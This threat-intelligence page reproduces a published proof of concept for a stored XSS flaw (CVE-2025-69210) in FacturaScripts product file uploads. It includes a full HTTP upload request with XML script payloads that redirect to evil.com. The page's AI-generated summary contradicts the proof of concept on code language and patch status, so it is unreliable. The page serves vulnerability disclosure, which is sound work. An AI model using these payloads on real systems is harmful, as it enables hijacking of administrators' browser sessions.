FacturaScripts 2025.43 - XSS
FacturaScripts version 2025. 43 is affected by a cross-site scripting (XSS) vulnerability. An exploit has been published in Perl language. The vulnerability is classified as medium severity. No patch or official remediation information is available at this time.
AI Analysis
Technical Summary
This threat concerns an XSS vulnerability in FacturaScripts 2025.43. The vulnerability allows injection of malicious scripts into web pages viewed by other users. Exploit code is publicly available in Perl. No affected versions list or patch information is provided, and the service is not cloud-hosted.
Potential Impact
Successful exploitation of this XSS vulnerability could allow an attacker to execute arbitrary scripts in the context of the affected web application, potentially leading to session hijacking, defacement, or other client-side attacks. However, no evidence of exploitation in the wild is reported.
Mitigation Recommendations
Patch status is not yet confirmed — check the vendor advisory for current remediation guidance. Until an official fix is available, users should apply standard XSS mitigations such as input validation and output encoding where possible.
Indicators of Compromise
- exploit-code: # Exploit Title: FacturaScripts 2025.43 - XSS # Date: 30-12-2025 # Exploit Author: VETTRIVEL U # Author Profile: https://www.linkedin.com/in/vettrivel2006 # Vendor Homepage: https://facturascripts.com/ # Software Link: https://github.com/NeoRazorX/facturascripts # Affected Versions: <= 2025.4, = 2025.11, = 2025.41, = 2025.43 # Fixes: https://github.com/NeoRazorX/facturascripts/commit/e908ade21c84bdc9d51190057482316730c66146 # Patched Releases: https://github.com/NeoRazorX/facturascripts/releases/tag/v2025.7 # Tested on: Windows # GitHub Advisories: https://github.com/advisories/GHSA-2267-xqcf-gw2m # CVE Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69210 # CVE: CVE-2025-69210 ---------------------------------------------------------------------------------------- ## Description A stored cross-site scripting (XSS) vulnerability exists in the product file upload functionality. Authenticated users can upload crafted XML files containing executable JavaScript. These files are later rendered by the application without sufficient sanitization or content-type enforcement, allowing arbitrary JavaScript execution when the file is accessed. Because product files uploaded by regular users are visible to administrative users, this vulnerability can be leveraged to execute malicious JavaScript in an administrator’s browser session. ---------------------------------------------------------------------------------------- ## Steps to Reproduce 1. Log in as a normal user. 2. Navigate to the Warehouse → Products section: http://localhost:8888/ListProducto 3. Click New Product, enter the details (Example below), and save: Product Reference: XSS POC Description: Stored XSS PoC 4. Go to the Files section of the product. 5. Upload a crafted XML file containing JavaScript OR intercept the upload request using Burp Suite. 6. Modify the intercepted request body and inject the following payload as the uploaded XML file: POST /EditProducto?code=10 HTTP/1.1 Host: localhost:8888 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryPU65l8Am0L64rWdo Cookie: [authenticated session cookies] ------ ------WebKitFormBoundaryPU65l8Am0L64rWdo Content-Disposition: form-data; name="new-files[]"; filename="xss.xml" Content-Type: text/xml <html> <head></head> <body> <something:script xmlns:something=" <something:script xmlns:something="http://www.w3.org/1999/xhtml"> alert("XSS"); if (confirm("Now Redirect POC")) { top.location.href = "https://evil.com"; } </something:script> <a:script xmlns:a=" <a:script xmlns:a="http://www.w3.org/1999/xhtml"> alert("XSS"); if (confirm("Now Redirect POC")) { location.href = "https://evil.com"; } </a:script> <info> <name> <value> <![CDATA[ <script> alert("XSS"); if (confirm("Now Redirect POC")) { window.location = "https://evil.com"; } </script> ]]> </value> </name> <description> <value>Hello</value> </description> <url> <value>http://google.com</value> </url> </info> </body> </html> ------ ------WebKitFormBoundaryPU65l8Am0L64rWdo-- 6. Forward the request and save the product file. 7. Open the uploaded file using the generated file URL, for example: http://localhost:8888/MyFiles/2025/12/9.xml?myft=2043dbb7389b8208d24f4dafb046ee5d71acbda9 Observe that: A popup with the message “XSS” is displayed. Upon clicking OK, the browser redirects to an attacker-controlled domain. ---------------------------------------------------------------------------------------- ## Impact - Arbitrary JavaScript execution in the victim’s browser. - Products created by normal users are visible to administrators. When an admin opens the malicious file, the payload executes in the admin’s session. - Phishing & Redirect Abuse: Attackers can redirect victims to malicious domains. - If extended, this vulnerability could be chained with: - Session hijacking - CSRF token theft - Admin API abuse - Trust Boundary Violation: User-controlled XML content is rendered as active content without sanitization. ## Reference https://github.com/vettrivel007/CVE-Disclosures/blob/main/CVE-2025-69210.md https://github.com/advisories/GHSA-2267-xqcf-gw2m ## Author Details: Exploit Author: VETTRIVEL U Author Profile: https://www.linkedin.com/in/vettrivel2006 GitHub Profile: https://github.com/vettrivel007/
FacturaScripts 2025.43 - XSS
Description
FacturaScripts version 2025. 43 is affected by a cross-site scripting (XSS) vulnerability. An exploit has been published in Perl language. The vulnerability is classified as medium severity. No patch or official remediation information is available at this time.
AI-Powered Analysis
Machine-generated threat intelligence
Technical Analysis
This threat concerns an XSS vulnerability in FacturaScripts 2025.43. The vulnerability allows injection of malicious scripts into web pages viewed by other users. Exploit code is publicly available in Perl. No affected versions list or patch information is provided, and the service is not cloud-hosted.
Potential Impact
Successful exploitation of this XSS vulnerability could allow an attacker to execute arbitrary scripts in the context of the affected web application, potentially leading to session hijacking, defacement, or other client-side attacks. However, no evidence of exploitation in the wild is reported.
Mitigation Recommendations
Patch status is not yet confirmed — check the vendor advisory for current remediation guidance. Until an official fix is available, users should apply standard XSS mitigations such as input validation and output encoding where possible.
Technical Details
- Edb Id
- 52517
- Has Exploit Code
- true
- Code Language
- perl
Indicators of Compromise
Exploit Source Code
Exploit code for FacturaScripts 2025.43 - XSS
# Exploit Title: FacturaScripts 2025.43 - XSS # Date: 30-12-2025 # Exploit Author: VETTRIVEL U # Author Profile: https://www.linkedin.com/in/vettrivel2006 # Vendor Homepage: https://facturascripts.com/ # Software Link: https://github.com/NeoRazorX/facturascripts # Affected Versions: <= 2025.4, = 2025.11, = 2025.41, = 2025.43 # Fixes: https://github.com/NeoRazorX/facturascripts/commit/e908ade21c84bdc9d51190057482316730c66146 # Patched Releases: https://github.com/NeoRazorX/facturascripts/release... (4184 more characters)
Threat ID: 69f1f0fdcbff5d8610047e62
Added to database: 4/29/2026, 11:52:29 AM
Last enriched: 4/29/2026, 11:53:35 AM
Last updated: 4/30/2026, 3:48:54 AM
Views: 11
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Actions
Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.
External Links
Need more coverage?
Upgrade to Pro Console for AI refresh and higher limits.
For incident response and remediation, OffSeq services can help resolve threats faster.
Latest Threats
Check if your credentials are on the dark web
Instant breach scanning across billions of leaked records. Free tier available.